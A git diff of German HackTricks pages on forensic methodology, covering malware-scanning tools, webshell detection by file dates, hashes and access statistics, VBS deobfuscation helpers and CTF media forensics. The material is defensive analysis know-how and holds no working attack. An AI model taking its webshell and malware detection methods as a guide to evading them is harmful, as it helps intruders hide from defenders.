verschiedener Techniken zu finden. ### PEpper -[PEpper](https://github.com/Th3Hurrican3/PEpper) überprüft einige grundlegende Dinge in der ausführbaren Datei (Binärdaten, Entropie, URLs und IPs, einige Yara-Regeln). +[PEpper](https://github.com/Th3Hurrican3/PEpper) überprüft einige grundlegende Dinge innerhalb der ausführbaren Datei (Binärdaten, Entropie, URLs und IPs, einige Yara-Regeln). ### PEstudio -[PEstudio](https://www.winitor.com/download) ist ein Tool, das Informationen über Windows-Executable-Dateien wie Imports, Exports und Header abruft, aber auch VirusTotal überprüft und potenzielle Att\&ck-Techniken findet. +[PEstudio](https://www.winitor.com/download) ist ein Tool, das Informationen über Windows-Executable wie Imports, Exports, Header liefert, aber auch Virus Total überprüft und potenzielle Att\&ck-Techniken findet. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) ist ein Tool, um festzustellen, ob eine Datei **verschlüsselt** ist, und um **Packer** zu finden. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) ist ein Tool, um festzustellen, ob eine Datei **verschlüsselt** ist und auch **Packer** zu finden. ### NeoPI -[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) ist ein Python-Skript, das verschiedene **statistische Methoden** verwendet, um **obfuskierte** und **verschlüsselte** Inhalte in Text-/Skriptdateien zu erkennen. Der beabsichtigte Zweck von NeoPI besteht darin, bei der **Erkennung von verstecktem Webshell-Code** zu helfen. +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) ist ein Python-Skript, das eine Vielzahl von **statistischen Methoden** verwendet, um **obfuskierte** und **verschlüsselte** Inhalte in Text-/Skriptdateien zu erkennen. Der beabsichtigte Zweck von NeoPI besteht darin, bei der **Erkennung von verstecktem Web-Shell-Code** zu helfen. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) gibt sein Bestes, um **obfuskierten**/**fragwürdigen Code** sowie Dateien zu erkennen, die **PHP**-Funktionen verwenden, die häufig in **Malware**/Webshells verwendet werden. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) tut sein Bestes, um **obfuskierten**/**fragwürdigen Code** sowie Dateien zu erkennen, die **PHP**-Funktionen verwenden, die häufig in **Malware**/Webshells verwendet werden. -### Apple-Binärsignaturen +### Apple Binary Signatures Beim Überprüfen einer **Malware-Probe** sollten Sie immer die Signatur der Binärdatei überprüfen, da der **Entwickler**, der sie signiert hat, möglicherweise bereits mit **Malware** in Verbindung gebracht wird. ```bash @@ -243,28 +152,14 @@ spctl --assess --verbose /Applications/Safari.app ``` ## Erkennungstechniken -### Datei-Stacking +### Dateistapelung -Wenn Sie wissen, dass sich in einem Ordner die **Dateien** eines Webservers befinden, die zuletzt am **Datum X aktualisiert wurden**, überprüfen Sie das **Erstellungs- und Änderungsdatum** aller Dateien auf dem Webserver. Wenn ein Datum **verdächtig** ist, überprüfen Sie diese Datei. +Wenn Sie wissen, dass ein Ordner, der die **Dateien** eines Webservers enthält, zuletzt am **Datum** aktualisiert wurde. Überprüfen Sie das **Datum**, an dem alle **Dateien** im **Webserver erstellt und geändert** wurden, und wenn ein Datum **verdächtig** ist, überprüfen Sie diese Datei. ### Baselines -Wenn die Dateien eines Ordners **nicht geändert worden sein sollten**, können Sie den **Hash-Wert** der **ursprünglichen Dateien** des Ordners berechnen und mit den **aktuellen Dateien** vergleichen. Alles, was geändert wurde, ist **verdächtig**. +Wenn die Dateien eines Ordners **nicht geändert worden sein sollten**, können Sie den **Hash** der **ursprünglichen Dateien** des Ordners berechnen und sie mit den **aktuellen** vergleichen. Alles, was geändert wurde, wird **verdächtig** sein. ### Statistische Analyse -Wenn die Informationen in Protokollen gespeichert sind, können Sie **Statistiken über die Anzahl der Zugriffe auf jede Datei eines Webservers überprüfen**, da eine Webshell eine der häufigsten sein könnte. - -
- -Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) **bei oder folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** - -
+Wenn die Informationen in Protokollen gespeichert sind, können Sie **Statistiken überprüfen, wie oft auf jede Datei eines Webservers zugegriffen wurde, da eine Webshell eine der häufigsten** sein könnte. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index c66d6f9cd..8c44fda28 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} -Hier finden Sie interessante Tricks für bestimmte Dateitypen und/oder Software: +Hier finden Sie interessante Tricks für spezifische Dateitypen und/oder Software: {% page-ref page=".pyc.md" %} @@ -37,16 +38,17 @@ Hier finden Sie interessante Tricks für bestimmte Dateitypen und/oder Software: +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index ad9985d40..54f1b19dc 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} Einige Dinge, die nützlich sein könnten, um eine bösartige VBS-Datei zu debuggen/deobfuskieren: @@ -28,36 +29,6 @@ Wscript.Echo "Like this?" cscript.exe file.vbs ``` ## Daten in eine Datei schreiben - -To write data to a file in Python, you can use the `write()` method of a file object. The `write()` method allows you to write a string of data to the file. Here's an example: - -```python -# Öffne die Datei im Schreibmodus -datei = open("datei.txt", "w") - -# Schreibe Daten in die Datei -datei.write("Hallo, Welt!") - -# Schließe die Datei -datei.close() -``` - -In diesem Beispiel wird die Datei "datei.txt" im Schreibmodus geöffnet. Dann wird der Text "Hallo, Welt!" in die Datei geschrieben. Schließlich wird die Datei geschlossen, um sicherzustellen, dass alle Änderungen gespeichert werden. - -Es ist wichtig zu beachten, dass der Schreibmodus (`"w"`) die Datei überschreibt, falls sie bereits existiert. Wenn du den Inhalt der Datei beibehalten möchtest und neue Daten hinzufügen möchtest, kannst du den Anfügemodus (`"a"`) verwenden: - -```python -# Öffne die Datei im Anfügemodus -datei = open("datei.txt", "a") - -# Schreibe Daten in die Datei -datei.write("Neue Daten") - -# Schließe die Datei -datei.close() -``` - -Mit dem Anfügemodus werden die neuen Daten am Ende der Datei hinzugefügt, ohne den vorhandenen Inhalt zu überschreiben. ```js Function writeBinary(strBinary, strPath) @@ -82,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 676ca7e69..209e76858 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,35 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -**PNG-Dateien** werden in **CTF-Herausforderungen** aufgrund ihrer **verlustfreien Komprimierung** hoch geschätzt, was sie ideal für das Einbetten versteckter Daten macht. Tools wie **Wireshark** ermöglichen die Analyse von PNG-Dateien, indem sie ihre Daten innerhalb von Netzwerkpaketen zerlegen und eingebettete Informationen oder Anomalien aufdecken. +**PNG-Dateien** sind in **CTF-Herausforderungen** aufgrund ihrer **verlustfreien Kompression** sehr geschätzt, was sie ideal für das Einbetten versteckter Daten macht. Tools wie **Wireshark** ermöglichen die Analyse von PNG-Dateien, indem sie ihre Daten innerhalb von Netzwerkpaketen zerlegen und eingebettete Informationen oder Anomalien aufdecken. -Zur Überprüfung der Integrität von PNG-Dateien und zur Reparatur von Korruption ist **pngcheck** ein wichtiges Tool, das eine Befehlszeilenfunktionalität zum Validieren und Diagnostizieren von PNG-Dateien bietet ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wenn Dateien über einfache Reparaturen hinausgehen, bieten Online-Dienste wie [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) eine webbasierte Lösung zum **Reparieren von beschädigten PNGs**, um bei der Wiederherstellung wichtiger Daten für CTF-Teilnehmer zu helfen. +Zur Überprüfung der Integrität von PNG-Dateien und zur Reparatur von Beschädigungen ist **pngcheck** ein entscheidendes Tool, das eine Befehlszeilenfunktionalität zum Validieren und Diagnostizieren von PNG-Dateien bietet ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wenn Dateien über einfache Reparaturen hinausgehen, bieten Online-Dienste wie [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) eine webbasierte Lösung zum **Reparieren von beschädigten PNGs**, was dazu beiträgt, wichtige Daten für CTF-Teilnehmer wiederherzustellen. Diese Strategien unterstreichen die Bedeutung eines umfassenden Ansatzes in CTFs, der eine Kombination aus analytischen Tools und Reparaturtechniken nutzt, um versteckte oder verlorene Daten aufzudecken und wiederherzustellen. +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index cbe54a10b..a97f73135 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,41 +1,27 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -**Audio- und Videodateimanipulation** ist ein fester Bestandteil von **CTF-Forensik-Herausforderungen**, bei denen **Steganografie** und Metadatenanalyse eingesetzt werden, um geheime Nachrichten zu verbergen oder aufzudecken. Tools wie **[mediainfo](https://mediaarea.net/en/MediaInfo)** und **`exiftool`** sind unerlässlich, um Dateimetadaten zu inspizieren und Inhaltsarten zu identifizieren. +**Audio- und Videodateimanipulation** ist ein Grundpfeiler in **CTF-Forensik-Herausforderungen**, die **Steganographie** und Metadatenanalyse nutzen, um geheime Nachrichten zu verbergen oder aufzudecken. Tools wie **[mediainfo](https://mediaarea.net/en/MediaInfo)** und **`exiftool`** sind unerlässlich für die Inspektion von Dateimetadaten und die Identifizierung von Inhaltstypen. -Für Audio-Herausforderungen ist **[Audacity](http://www.audacityteam.org/)** ein herausragendes Tool zum Anzeigen von Wellenformen und Analysieren von Spektrogrammen, das zum Aufdecken von in Audio codierten Texten unerlässlich ist. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** wird für detaillierte Spektrogrammanalysen sehr empfohlen. **Audacity** ermöglicht die Manipulation von Audio, wie das Verlangsamen oder Umkehren von Tracks, um versteckte Nachrichten zu erkennen. **[Sox](http://sox.sourceforge.net/)**, ein Befehlszeilen-Dienstprogramm, eignet sich hervorragend zum Konvertieren und Bearbeiten von Audiodateien. +Für Audio-Herausforderungen sticht **[Audacity](http://www.audacityteam.org/)** als erstklassiges Tool zur Anzeige von Wellenformen und Analyse von Spektrogrammen hervor, das für die Entschlüsselung von in Audio codierten Texten unerlässlich ist. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** wird für eine detaillierte Spektrogrammanalyse sehr empfohlen. **Audacity** ermöglicht die Audiomanipulation wie Verlangsamen oder Umkehren von Tracks, um versteckte Nachrichten zu erkennen. **[Sox](http://sox.sourceforge.net/)**, ein Befehlszeilen-Dienstprogramm, ist hervorragend für die Konvertierung und Bearbeitung von Audiodateien geeignet. -Die Manipulation der **Least Significant Bits (LSB)** ist eine gängige Technik in der Audio- und Video-Steganografie, bei der die festen Chunks von Mediendateien genutzt werden, um Daten diskret einzubetten. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** ist nützlich zum Decodieren von als **DTMF-Töne** oder **Morsecode** versteckten Nachrichten. +Die Manipulation der **Least Significant Bits (LSB)** ist eine gängige Technik in der Audio- und Video-Steganographie, die die festen Chunks von Mediendateien ausnutzt, um Daten unauffällig einzubetten. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** ist nützlich zum Decodieren von als **DTMF-Töne** oder **Morsecode** versteckten Nachrichten. -Video-Herausforderungen beinhalten oft Containerformate, die Audio- und Videostreams bündeln. **[FFmpeg](http://ffmpeg.org/)** ist das Standardwerkzeug zur Analyse und Manipulation dieser Formate und kann Inhalte demultiplexen und wiedergeben. Für Entwickler integriert **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** die Fähigkeiten von FFmpeg in Python für fortgeschrittene, skriptgesteuerte Interaktionen. +Video-Herausforderungen beinhalten oft Containerformate, die Audio- und Videostreams bündeln. **[FFmpeg](http://ffmpeg.org/)** ist das Standardwerkzeug zur Analyse und Manipulation dieser Formate, das in der Lage ist, Inhalte zu demultiplexen und wiederzugeben. Für Entwickler integriert **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** die Fähigkeiten von FFmpeg in Python für fortgeschrittene skriptfähige Interaktionen. -Diese Auswahl an Tools unterstreicht die Vielseitigkeit, die bei CTF-Herausforderungen erforderlich ist, bei denen die Teilnehmer ein breites Spektrum an Analyse- und Manipulationstechniken einsetzen müssen, um versteckte Daten in Audio- und Videodateien aufzudecken. +Dieses Arsenal an Tools unterstreicht die Vielseitigkeit, die in CTF-Herausforderungen erforderlich ist, bei denen die Teilnehmer eine breite Palette von Analyse- und Manipulationstechniken einsetzen müssen, um versteckte Daten in Audio- und Videodateien aufzudecken. ## Referenzen * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - - -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
